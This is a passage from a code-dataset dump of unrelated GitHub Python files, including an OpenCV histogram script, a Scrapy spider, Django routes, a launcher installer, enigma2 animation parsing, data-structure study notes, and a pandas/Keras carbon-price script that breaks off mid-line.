messages\n","repo_name":"timhawes/timhawes_circuitpython_nfc","sub_path":"timhawes_nfc/ntag.py","file_name":"ntag.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18854512250","text":"import cv2 # import the OpenCV module\nimport numpy as np # import the numpy module using the name 'np'.\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndef buildCDF(img, outputImageName, cIndex, title):\n hist= cv2.calcHist([img], [cIndex], None, [256], [0, 256])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max()/ cdf.max()\n \n fig = plt.figure()\n \n plt.plot(cdf_normalized, color = 'b')\n plt.hist(img.flatten(),256,[0,256], color = 'r')\n plt.xlim([0,256])\n plt.legend(('cdf','histogram'), loc = 'upper left')\n plt.title(title) # subplot 211 title\n plt.savefig(outputImageName)\n\nif __name__ == \"__main__\":\n imgGrey = cv2.imread('img/messi.jpg',0) # grey scale\n buildCDF(imgGrey, \"result/01-histogram-cfd-messi-grey.png\", 0, \"grey\")\n imgColor = cv2.imread('img/messi.jpg',1) # color BGR scale\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_b.png\", 0, \"b-color\")\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_g.png\", 1, \"g-color\")\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_r.png\", 2, \"r-color\")","repo_name":"matitaweb/mumet2017_computer_vision_homework","sub_path":"HOMEWORK_01/cumulative_histogram/cumulative_histogram.py","file_name":"cumulative_histogram.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"7226045656","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.loader import ItemLoader\nfrom parliament_lk.items import News\n\n\nclass NewsSpider(scrapy.Spider):\n name = 'news'\n allowed_domains = ['parliament.lk']\n start_urls = ['http://parliament.lk/en/news-en?view=news&category=6']\n\n def parse(self, response):\n for news in response.xpath('//td[@width=\"82%\"]/a/@href').extract():\n \tyield scrapy.Request(response.urljoin(news),callback=self.parseNews)\n\n next_page_url = response.xpath('//li[@class=\"pagination-next\"]/a/@href').extract_first()\n if next_page_url is not None:\n yield scrapy.Request(response.urljoin(next_page_url))\n\n\n def parseNews(self, response):\n \tl = ItemLoader(item=News(), response=response)\n \tl.add_xpath('title', '//table[@class=\"newsheader\"]//td//h2[1]/text()')\n \tl.add_xpath('date', '//table[@class=\"newsheader\"]//tr[1]/td[3]/text()')\n \tl.add_xpath('content', '//div[@class=\"inner-div newsarea\"]/div[1]/p[string-length(text()) > 3]/text()')\n \tyield l.load_item()\n","repo_name":"prabod/CS4642-IR-Parliament.lk-Scraper","sub_path":"parliament_lk/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18425277017","text":"from django.urls import path\nfrom work1App import views\n\n\nurlpatterns = [\n path('', views.apiOverview, name='api-Overview'),\n #CRUD\n path('add/', views.add,name='add'),\n path('Search_filter/', views.Search_filter.as_view(),name='Search_filter'),\n path('update//', views.update,name='update'),\n path('remove//', views.remove,name='remove'),\n path('viewAll/', views.viewAll,name='viewAll'),\n \n\n]\n\n","repo_name":"Aju600610/work1-evaluation-ajith","sub_path":"work1pro/work1App/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"3320883982","text":"#!/usr/bin/env python\n\nimport click\n\n@click.option('-o',\n '--opt',\n required=False, \n help='Provide additional data if required')\n@click.argument('argu',\n required=True)\n@click.command()\ndef mycli(argu, opt):\n \"\"\"Env is all set!!!!\"\"\"\n print(\"Provided argument is {} and Option is {}\".format(argu, opt))\n\nif __name__ == '__main__':\n mycli()\n","repo_name":"Lakshmisowmya/git_apis_cli","sub_path":"my-cli.py","file_name":"my-cli.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15857499761","text":"import requests\nimport os\nimport zipfile\n\n# demande où installer l'application\nprint(\"Installateur du launcher de Fastattack\")\nprint(\"Verion de l'installateur: v1.2, version du launcher à installer: v1.2\")\nvarb = True\ndossier = \"\"\nwhile varb:\n dossier = input(\"Dans quel dossier voulez vous installer le launcher [chemin valide]: \")\n if dossier.startswith('\"') and dossier.endswith('\"'):\n dossier = dossier.removeprefix('\"')\n dossier = dossier.removesuffix('\"')\n if os.path.isdir(dossier):\n varb = False\n else:\n print(\"Chemin/nom de dossier invalide\")\n\n# demande s'il faut créer un raccourci sur le bureau\nraccourci = input(\"Voulez vous créer un raccourci sur le bureau [Y/n]: \")\nif raccourci == \"Y\":\n racourci = True\nelse:\n raccourci = False\n\n# télécharge le fichier .zip qui contient l'application et les fichiers\nurl = \"https://github.com/fastattackv/Launcher-de-Fastattack/blob/main/T%C3%A9l%C3%A9chargements/Launcher%20de%20Fastattack%20v1.2.zip?raw=true\"\nfilename = dossier + r\"\\Launcher de Fastattack v1.0.zip\"\ntry:\n r = requests.get(url)\nexcept:\n print(\"ERROR: Le fichier à télécharger n'existe pas: essayez d'éxecuter la dernière version de l'application d'installation\")\n input(\"Entrée pour quitter\")\nelse:\n f = open(filename, 'wb')\n f.write(r.content)\n f.close()\n\n# dézip le fichier\n with zipfile.ZipFile(filename, 'r') as zip_ref:\n zip_ref.extractall(dossier)\n\n# supprime le .zip\n os.remove(filename)\n\n# créé le raccourci\n if raccourci:\n import win32com.client\n\n chemin = os.path.join(os.path.join(os.environ['USERPROFILE']), r'Desktop\\Launcher de Fastattack.lnk')\n target = dossier + r\"\\Launcher de Fastattack\\Launcher de Fastattack.exe\"\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n shortcut = shell.CreateShortCut(chemin)\n shortcut.Targetpath = target\n shortcut.WindowStyle = 7\n shortcut.save()\n\n print(\"Installation terminée\")\n input(\"Entrée pour quitter\")\n","repo_name":"fastattackv/Launcher-de-Fastattack","sub_path":"Fichiers source (.py)/Installer_launcher_de_Fastattack.py","file_name":"Installer_launcher_de_Fastattack.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"74330749223","text":"from enigma import getDesktop, eSize, ePoint, eMatrix4x4, eFloatAnimation, ePointAnimation, eSizeAnimation, eMatrixAnimation, eLinearInterpolator, eAcclerateInterpolator, eDecelerateInterpolator, eOvershootInterpolator, eBounceInterpolator, eWindowAnimationManager, eWindowAnimationSet\nfrom Tools.Directories import resolveFilename, fileExists, SCOPE_SKIN\nfrom Tools.Log import Log\nimport xml.etree.cElementTree as ET\n\nclass ScreenAnimations(object):\n\tdef __init__(self):\n\t\tself._desktopSize = getDesktop(0).size()\n\n\tdef loadDefault(self):\n\t\tanimset = eWindowAnimationSet.create()\n\t\tanimset.setKey(eWindowAnimationManager.KEY_DISABLED)\n\t\tanimset.setName(_(\"Disable Animations\"))\n\t\teWindowAnimationManager.setAnimationSet(animset)\n\t\tf = resolveFilename(SCOPE_SKIN, \"animations.xml\")\n\t\tif fileExists(f):\n\t\t\tself.fromXML(filesource=f)\n\n\tdef fromXML(self, filesource=None, xml=None):\n\t\tif filesource:\n\t\t\troot = ET.parse(filesource).getroot()\n\t\telse:\n\t\t\troot = ET.fromstring(xml)\n\t\tfor animation in root:\n\t\t\ttry:\n\t\t\t\tattrib = animation.attrib\n\t\t\t\tkey = attrib[\"key\"]\n\t\t\t\tname = _(attrib.get(\"title\", key))\n\t\t\t\tinternal = \"internal\" in attrib\n\t\t\t\tduration = int(attrib.get(\"duration\", 0))\n\t\t\t\talpha = pos = size = matrix = 0\n\t\t\t\talpha_hide = pos_hide = size_hide = rotate_hide = 0\n\n\t\t\t\tfor item in animation:\n\t\t\t\t\tif item.tag == \"alpha\":\n\t\t\t\t\t\talpha = self._buildFloatAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"position\":\n\t\t\t\t\t\tpos = self._buildPointAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"size\":\n\t\t\t\t\t\tsize = self._buildSizeAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"rotate\":\n\t\t\t\t\t\tmatrix = self._buildMatrixAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"alpha_hide\":\n\t\t\t\t\t\talpha_hide = self._buildFloatAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"position_hide\":\n\t\t\t\t\t\tpos_hide = self._buildPointAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"size_hide\":\n\t\t\t\t\t\tsize_hide = self._buildSizeAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"rotate_hide\":\n\t\t\t\t\t\trotate_hide = self._buildMatrixAnimation(item, duration, self._buildInterpolator(attrib))\n\n\t\t\t\tif alpha or pos or size or matrix or alpha_hide or pos_hide or size_hide or rotate_hide:\n\t\t\t\t\tanimset = eWindowAnimationSet.create()\n\t\t\t\t\tanimset.setKey(key)\n\t\t\t\t\tanimset.setName(name)\n\t\t\t\t\tanimset.setInternal(internal)\n\t\t\t\t\tif alpha:\n\t\t\t\t\t\tanimset.setAlpha(alpha)\n\t\t\t\t\tif pos:\n\t\t\t\t\t\tanimset.setPos(pos)\n\t\t\t\t\tif size:\n\t\t\t\t\t\tanimset.setSize(size)\n\t\t\t\t\tif matrix:\n\t\t\t\t\t\tanimset.setMatrix(matrix)\n\t\t\t\t\tif alpha_hide:\n\t\t\t\t\t\tanimset.setAlphaReverse(alpha_hide)\n\t\t\t\t\tif pos_hide:\n\t\t\t\t\t\tanimset.setPosReverse(pos_hide)\n\t\t\t\t\tif size_hide:\n\t\t\t\t\t\tanimset.setSizeReverse(size_hide)\n\t\t\t\t\tif rotate_hide:\n\t\t\t\t\t\tanimset.setMatrixReverse(rotate_hide)\n\t\t\t\t\teWindowAnimationManager.setAnimationSet(animset)\n\n\t\t\texcept Exception as ex:\n\t\t\t\tLog.w(\"FAILED to parse an xml defined animation! %s: %s\\n%s\" %(animation.tag, animation.attrib, ex))\n\n#eLinearInterpolator()\n#eAcclerateInterpolator(float factor)\n#eDecelerateInterpolator(float factor)\n#eOvershootInterpolator(float tension = 2.0)\n#eBounceInterpolator()\n\tdef _buildInterpolator(self, attrib):\n\t\tinterpolator = eLinearInterpolator.create() #boring linear is the default\n\t\tkey = attrib.get(\"interpolate\", \"linear\")\n\t\tif key == \"accelerate\":\n\t\t\tif \"factor\" in attrib:\n\t\t\t\tinterpolator = eAcclerateInterpolator.create( float(attrib[\"factor\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eAcclerateInterpolator.create()\n\t\telif key == \"decelerate\":\n\t\t\tif \"factor\" in attrib:\n\t\t\t\tinterpolator = eDecelerateInterpolator.create( float(attrib[\"factor\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eDecelerateInterpolator.create()\n\t\telif key == \"overshoot\":\n\t\t\tif \"tension\" in attrib:\n\t\t\t\tinterpolator = eOvershootInterpolator.create( float(attrib[\"tension\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eOvershootInterpolator.create()\n\t\telif key == \"bounce\":\n\t\t\tinterpolator = eBounceInterpolator.create()\n\n\t\treturn interpolator\n\n#eFloatAnimation(int64_t duration, float from, float to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildFloatAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"alpha_hide\"\n\t\tfromValue = float(attrs[\"val\"])\n\t\ttoValue = 1.0\n\t\tif isReverse:\n\t\t\treturn eFloatAnimation.create(duration, toValue, fromValue, False, interpolator)\n\t\telse:\n\t\t\treturn eFloatAnimation.create(duration, fromValue, toValue, False, interpolator)\n\n#ePointAnimation(int64_t duration, ePoint from, ePoint to, bool reversed = false, ePtr interpolator=0, bool isReverse=false, bool animateX=true, bool animateY=true)\n\tdef _buildPointAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"position_hide\"\n\t\tanimateX = \"animateX\" in attrs\n\t\tanimateY = \"animateY\" in attrs\n\t\tif not animateX and not animateY:\n\t\t\tanimateX = animateY = True\n\n\t\tfactor = float(attrs[\"val\"])\n\t\tx = int( self._desktopSize.width() * factor )\n\t\ty = int( self._desktopSize.height() * factor )\n\n\t\tif isReverse:\n\t\t\tfromPos = ePoint()\n\t\t\ttoPos = ePoint(x,y)\n\t\telse:\n\t\t\tfromPos = ePoint(x,y)\n\t\t\ttoPos = ePoint()\n\t\treturn ePointAnimation.create(duration, fromPos, toPos, factor, False, interpolator, isReverse, animateX, animateY)\n\n#eSizeAnimation(int64_t duration, eSize from, eSize to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildSizeAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"size_hide\"\n\t\tanimateW = \"animateW\" in attrs\n\t\tanimateH = \"animateH\" in attrs\n\t\tcentered = \"centered\" in attrs\n\t\tif not animateW and not animateH:\n\t\t\tanimateW = animateH = True\n\t\tw, h = attrs[\"val\"].split(\",\")\n\t\tw, h = int(w), int(h)\n\t\tfromSize = eSize(w,h)\n\t\ttoSize = eSize()\n\t\treturn eSizeAnimation.create(duration, fromSize, toSize, False, interpolator, isReverse, animateW, animateH, centered)\n\n#eMatrixAnimation(int64_t duration, eMatrix4x4 from, eMatrix4x4 to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildMatrixAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tx,y = float(attrs.get(\"x\", \"0\")), float(attrs.get(\"y\", \"0\"))\n\t\t#z = float(attrs.get(\"z\", \"0\"))\n\t\tfromMatrix = eMatrix4x4.rotateX(x) * eMatrix4x4.rotateY(y)#z axis rotation is currently not suported * eMatrix4x4.rotateZ(z)\n\t\ttoMatrix = eMatrix4x4.identity()\n\t\treturn eMatrixAnimation.create(duration, fromMatrix, toMatrix, False, interpolator)\n","repo_name":"opendreambox/enigma2","sub_path":"usr/lib/enigma2/python/Components/ScreenAnimations.py","file_name":"ScreenAnimations.py","file_ext":"py","file_size_in_byte":6944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30989693957","text":"\"\"\" Ch 4: Trees and Graphs ~~~~~~~~~~~~~~~~~~~~\n\n* Note that Worst and avg case times may vary\n* Ask lots of clarifying questions! \n* There are many types!\n\nGraphs:\n\t- \n\nTrees\n\t- are a type of graph\n\t- composed of nodes\n\t- has a root node\n\t- each node has 0 or more child nodes\n\t- and so on, recursively\n\nBinary Trees\n\t- A tree where each node has 0-2 children\n\t- 'leaf' is a node w/o children\n\nBinary Search Tree\n\t- A Binary tree is a binary serach tree if\n\tall left descendenc <= n < all right descendents.\n\t- True for each node n\n\t- Clarify where duplicate values should be\n\n\"Balanced\"\n\t- Not perfect, but more or less so\n\t- Approx O(log n) for `insert` and `find`\n\n\"Complete\"\n\t- If you filled it from left to right, as you should,\n\t- The right slot is missing, not the left slot\n\n\"Full Binary Tree\"\n\t- Each node has zero or two children\n\t- No nodes have only one child\n\n\"Perfect Binary Tree\"\n\t- Both full and complete\n\t- All leaf nodes at same level\n\t- If so, a perfect tree has 2^k - 1 nodes\n\n\"Min-Heap\"\n\t- \n\n\"\"\"\n\nclass Node:\n\t\"\"\" A general node for trees or graphs\n\t\t>>> n3 = Node('n3')\n\t\t>>> print(n3)\n\t\tLeaf n3\n\t\t>>> n2 = Node('n2', [n3]), \n\t\t>>> print(n2)\n\t\t(Node n2 [Leaf n3],)\n\t\t>>> n1 = Node('n1', children=[n2, Node('n4')])\n\t\t>>> print(n1)\n\t\tNode n1 [(Node n2 [Leaf n3],), Leaf n4]\n\t\"\"\"\n\n\tdef __init__(self, data, children=[]):\n\t\tself.data = data\n\t\tself.children = children\n\n\tdef __repr__(self):\n\t\t# return self.children\n\t\tif self.children == []:\n\t\t\treturn 'Leaf ' + str(self.data)\n\t\telse:\n\t\t\treturn 'Node ' + str(self.data) + ' ' + str(self.children)\n\n\tdef find_stack(self, data):\n\t\t\"\"\" Return node object w/ this data \n\t\tIterative solution (but can be recursive)\n\n\t\tUses a Stack - LIFO\n\t\t\n\t\tDepth First Search \n\t\t\"\"\"\n\n\t\t# Start a STACK to keep track of nodes to visit.\n\t\tto_visit = [self]\n\n\t\twhile to_visit:\n\t\t\t# Pop the last item on the list\n\t\t\tcurr = to_visit.pop()\n\n\t\t\tif curr.data == data:\n\t\t\t\treturn curr\n\n\t\t\t# Else, it is not them.\n\t\t\t# add children list to end of 'to visit' list\n\t\t\tto_visit.extend(curr.children) \n\n\t\t\t# If they do not have children, they just get popped\n\t\t\t# and you go to the next one in the stack...\n\n\t\tdef find_queue(self, data):\n\t\t\t\"\"\" Return node object w/ this data\n\t\t\tSimply by changing to queue\n\n\t\t\twe can do a FIFO\n\n\t\t\tBreadth First Search!! \n\t\t\t\"\"\"\n\n\t\t\t# Goal : get a higher ranking node\n\n\t\t\tto_visit = [self] # QUEUE\n\n\t\t\twhile to_visit:\n\t\t\t\tcurr = to_visit.pop(0) # Get the highest (first in queue)\n\n\t\t\t\tif curr.data == data:\n\t\t\t\t\treturn curr\n\n\t\t\t\t# Else, add all children to the queue\n\t\t\t\tto_visit.extend(curr.children)\n\n\nclass Tree:\n\t\"\"\" Class representing a Tree\n\n\t\t** EXPLAINATION **\n\t\tYou know that a Node is itself a Tree??\n\t\tThat means, it's a little 'extra' to make a Tree class at all.\n\n\t\tSo, here we want to make sure a single node has all\n\t\tthe functionality it needs. That is why Node defines\n\t\ta .find() method!\n\n\t\tAnd here, we wrote a find_in_tree method that literally\n\t\tjust calls the Node.find() method cuz we want to \n\t\tkeep the sexy encapsulation.\n\n\t\"\"\"\n\n\tdef __init__(self, root):\n\t\tself.root = root\n\n\tdef __repr__(self):\n\t\t\"\"\"Reader-friendly representation.\"\"\"\n\t\treturn \"\".format(root=self.root)\n\n\tdef find_in_tree(self, data):\n\t\t\"\"\"Return node object with this data.\n\n\t\tStart at root.\n\t\tUse the method from root to find the data\n\t\tReturn None if not found.\n\n\t\t\"\"\"\n\t\treturn self.root.find(data)\n\n\tdef list_nodes_recursive(self, node):\n\t\tprint(node.data)\n\t\tfor child in node.children:\n\t\t\tlist_nodes_recursive(child)\n\n\nclass BinaryNode:\n\t\"\"\" A Binary Search node for trees or graphs\n\n\t\t# Create root node:\n\t\t>>> bn = BinaryNode(0)\n\t\t>>> print(bn.data, bn.right, bn.left)\n\t\t0 None None\n\n\t\t# Add a new data - creates a new node & decides if it should go right or left:\n\t\t>>> bl = BinaryNode(-1)\n\t\t>>> bn.insert(-1)\n\t\t>>> bn.PrintTree()\n\t\t0\n\n\t\"\"\"\n\tdef __init__(self, data, left=None, right=None):\n\t\t# Doesnt take left and right because we must leave that to the \n\t\t# 'insert' method - that takes care of the ordering of the \n\t\t# new nodes when adding them to the tree.\n\n\t\tself.left = left\n\t\tself.right = right\n\t\tself.data = data\n\n\tdef __repr__(self):\n\t\t\"\"\"Debugging-friendly representation.\"\"\"\n\n\t\treturn \"\".format(data=self.data)\n\n\n\tdef insert(self, data):\n\t\t# Suppose the parent is 'self ' - the root\n\t\t# We want to add one child - new node with data\n\t\t# * Recursively * - with each recursive step, update the self.\n\t\t# Compare the value ' data ' of a new node with the \n\t\t\t# parent node ' self.data ' \n\t\t\t# and decides where to add it to the tree\n\n\t\tprint('self.data', self.data)\n\n\t\tif self.data != None: \n\n\t\t\t# Try the left side\t\t\n\t\t\tif data < self.data:\n\n\t\t\t\t# If left branch is empty, add new node to left\n\t\t\t\tif self.left == None:\n\t\t\t\t\tprint('self.left', self.left)\n\t\t\t\t\tself.left = BinaryNode(data)\n\t\t\t\t\tprint('self.left', self.left)\n\t\t\t\telse:\n\t\t\t\t\tself.left.insert(data) # Recursive call\n\n\t\t\telif data > self.data:\n\t\t\t\tif self.right == None:\n\t\t\t\t\tprint('self.right', self.right)\n\t\t\t\t\tself.right = BinaryNode(data)\n\t\t\t\t\tprint('self.right', self.right)\n\t\t\t\telse:\n\t\t\t\t\tprint('recursive, both branches are full', self.left, self.right)\n\t\t\t\t\tself.right.insert(data)\n\t\telse:\n\t\t\t# If self.data == None, or self.data == data, set self.data to new data\n\t\t\t# We are creating the head with the root?\n\n\n\n\t\t\t# Why: when we initialize the list, we set self but not self.data\n\t\t\t# SO it has an 'empty head'?\n\t\t\tself.data = data\n\n\n\n\tdef find(self, sought):\n\t\t\"\"\" Start at the node you're at ( where\n\t\t'self' is treated like a root, every time)\n\n\t\tUse a while loop \n\n\t\tGo through, looking left and right. \n\n\t\tUpdate curr in the 'right direction'\n\n\t\tReturn node with this data. \n\t\tStart at root and return None if not found\n\t\t\"\"\"\n\t\t# Start at the root\n\t\tcurr = self\n\n\t\twhile curr:\n\n\t\t\tprint('checking curr.data', curr.data)\n\n\t\t\tif curr.data == sought:\n\t\t\t\treturn curr\n\n\t\t\telif sought < curr.data:\n\t\t\t\tcurr = curr.left\n\n\t\t\telif sought > curr.data:\n\t\t\t\tcurr = curr.right\n\n\t\treturn \"None\"\n\n\n\n\n\tdef PrintTree(self):\n\t\tif self.left:\n\t\t\tself.left.PrintTree()\n\t\t\tprint(self.data)\n\t\tif self.right:\n\t\t\tself.right.PrintTree()\n\n\t# if __name__ == \"__main__\":\n\n\t# apple = BinaryNode(\"apple\")\n\t# ghost = BinaryNode(\"ghost\")\n\t# fence = BinaryNode(\"fence\", apple, ghost)\n\t# just = BinaryNode('just')\n\t# jackal = BinaryNode(\"jackal\", fence, just)\n\t# zebra = BinaryNode(\"zebra\")\n\t# pencil = BinaryNode(\"pencil\", None, zebra)\n\t# mystic = BinaryNode(\"mystic\")\n\t# pluto = BinaryNode(\"nerd\", mystic, pencil)\n\t# money = BinaryNode(\"money\", jackal, pluto)\n\n\t# print(money.find(\"nerd\"))\n\n\t# root = BinaryNode(12)\n\t# print(root)\n\n\t# root.insert(3)\n\t# root.insert(2)\n\t# root.insert(10)\n\t# root.insert(11)\n\n\n\t# import doctest\n\t# doctest.testmod()\n\n\t# Make a filesystem\n\t# resume = Node(\"resume.txt\", [])\n\t# recipes = Node(\"recipes.txt\", [])\n\t# jane = Node(\"jane/\", [resume, recipes])\n\t# server = Node(\"server.py\", [])\n\t# jessica = Node(\"jessica/\", [server])\n\t# users = Node(\"Users/\", [jane, jessica])\n\t# root = Node(\"/\", [users])\n\n\t# tree = Tree(root)\n\t# print(\"server.py = \", tree.find_in_tree(\"server.py\")) # Will find\n\t# print(\"style.css = \", tree.find_in_tree(\"style.css\")) # will not find\n\n\nclass TreeTraversals:\n\t\"\"\"\n\tTraversals:\n\t- In order traversal\n\t\t\tVisit the left branch, then current, then right\n\t- Pre-order traversal\n\t\t\tVisits the current node before its child nodes\n\t- Post-order traversal\n\t\t\tVisits the current node after its child nodes\n\t\"\"\"\n\tdef in_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes before its \n\t\t\tchild nodes\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\tin_order_traversal(node.left)\n\t\t\tvisit(node)\n\t\t\tin_order_traversal(node.right)\n\n\tdef pre_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes before its \n\t\t\tchild nodes\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\tvisit(node)\n\t\t\tpre_order_traversal(node.left)\n\t\t\tpre_order_traversal(node.right)\n\n\tdef post_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes after its \n\t\t\tchild nodes\n\n\t\t\tThe root will always be the last node visited.\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\t\n\t\t\tpre_order_traversal(node.left)\n\t\t\tpost_order_traversal(node.right)\n\t\t\tvisit(node)\n\n\n# if __name__ == \"__main__\":\n\t# import doctest\n\t# doctest.testmod()\n\n\t# Make a filesystem\n\t# resume = Node(\"resume.txt\", [])\n\t# recipes = Node(\"recipes.txt\", [])\n\t# jane = Node(\"jane/\", [resume, recipes])\n\t# server = Node(\"server.py\", [])\n\t# jessica = Node(\"jessica/\", [server])\n\t# users = Node(\"Users/\", [jane, jessica])\n\t# root = Node(\"/\", [users])\n\n\t# tree = Tree(root)\n\t# print(\"server.py = \", tree.find_in_tree(\"server.py\")) # Will find\n\t# print(\"style.css = \", tree.find_in_tree(\"style.css\")) # will not find\n\n\t# pass\n\n\n\nclass GraphNode:\n\n\tdef __init__(self, name, children=None):\n\t\tself.name = name\n\t\tself.children = children\n\n\tdef __repr__(self):\n\t\treturn f'{self.name}- c:{self.children}'\n\n\n\nclass Graph:\n\t\"\"\" Graph class must be used b/c you might not necessarily \n\t\treach all the nodes from a single GraphNode\n\t\"\"\"\n\n\tdef __init__(self, nodes=[]):\n\t\tself.nodes = nodes\n\n\tdef __repr__(self):\n\t\treturn f'ndz:{self.nodes}'\n\n\n\n\n\nif __name__ == \"__main__\":\n\tgn = GraphNode('gn')\n\tprint(gn)\n\n\tg = Graph()\n\tprint(g)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"liv-yaa/Py_Code_Challenges","sub_path":"CTCI_2020/trees-graphs-ch4.py","file_name":"trees-graphs-ch4.py","file_ext":"py","file_size_in_byte":9198,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"26620838051","text":"import pandas as pd\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom sqlalchemy import create_engine\n\nengine = create_engine('mysql+pymysql://root:shero@localhost/sheroDB', echo=True)\n\ndef data_from_csv():\n wti = pd.read_csv('data/WTI_20050630_20200417.csv')\n wti_after_2015 = wti[wti['date'] > '2015-01-11']\n #print(wti_after_2015.head())\n #print(wti_after_2015.describe())\n\n # KAU\n kau18 = pd.read_csv('data/KAU18.csv', header=0,\n names=['date', 'name', 'price', 'diff', 'diff_per', 'high_price',\n 'low_price', 'volume', 'transaction_price', 'weighted_average'])\n kau18_price = kau18[['date', 'price']]\n kau18_price.sort_values(by=['date'], ascending=True, inplace=True,\n kind='mergesort', ignore_index=True)\n day_count = [i for i in range(kau18_price.count()['date'])]\n kau18_price['day'] = day_count\n #print(kau18_price.describe())\n #print(kau18_price.tail())\n\n\n kau19 = pd.read_csv('data/KAU19.csv', header=0,\n names=['date', 'name', 'price', 'diff', 'diff_per', 'high_price',\n 'low_price', 'volume', 'transaction_price', 'weighted_average'])\n kau19_price = kau19[['date', 'price']]\n kau19_price.sort_values(by=['date'], ascending=True, inplace=True,\n kind='mergesort', ignore_index=True)\n day_count = [i for i in range(kau19_price.count()['date'])]\n kau19_price['day'] = day_count\n #print(kau19_price.describe())\n #print(kau19_price.tail())\n\n kau1819 = kau18_price.append(kau19_price, ignore_index=True)\n #print(kau1819)\n\n return (wti_after_2015, kau1819)\n\n\ndef data_from_xls():\n #ELECTRICITY\n elec = pd.read_excel('data/electricity_20140101_20201025.xlsx',\n names=['date', '1', '2', '3', '4', '5', '6', '7', '8'\n , '9', '10', '11', '12', '13', '14', '15', '16'\n , '17', '18', '19', '20', '21', '22', '23', '24'])\n elec_after_2015 = elec[elec['date']>'2015-01-11']\n elec_day = elec_after_2015.sum(axis=1)\n elec_after_2015['elec'] = elec_day\n elec_after_2015.drop(['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12',\n '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24' ], axis='columns', inplace=True)\n # print(elec_after_2015.head())\n\n return (elec_after_2015)\n\ndef scale(df):\n print('')\n\ndef struct_data(wti, elec, kau):\n #유가는 금융시장에서 매겨지기 때문에 시장이 쉬는 날에는 데이터가 없다.\n #전력은 매일 있다.\n #그래서 유가 데이터가 없는 날의 전력 데이터는 없애야 한다.\n df = pd.DataFrame()\n\n for index, row in kau.iterrows() :\n if not wti[wti['date']==row['date']].empty :\n #print(wti[wti['date']==row['date']]['WTI($/bbl)'].values[0])\n new_row = { 'date' : row['date'], 'day' : row['day'], 'price' : row['price'],'WTI($/bbl)' : wti[wti['date']==row['date']]['WTI($/bbl)'].values[0] }\n df = df.append(new_row, ignore_index=True)\n df.insert(4,'elec', 0)\n for index, row in df.iterrows() :\n if not elec[elec['date']==row['date']].empty :\n #print(elec[elec['date']==row['date']]['elec'].values[0])\n #new_row = {'elec' : elec[elec['date']==row['date']]['elec'].values[0]}\n #df.loc[index]['elec'] = (elec[elec['date']==row['date']]['elec'].values[0])\n df.loc[index,'elec'] = (elec[elec['date']==row['date']]['elec'].values[0])\n return df\n #print(df.describe())\n #print(df.info())\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_model():\n model = keras.Sequential()\n model.add(Dense(16, input_dim = 3, activation='relu'))\n model.add(Dense(8, activation='relu'))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(1, 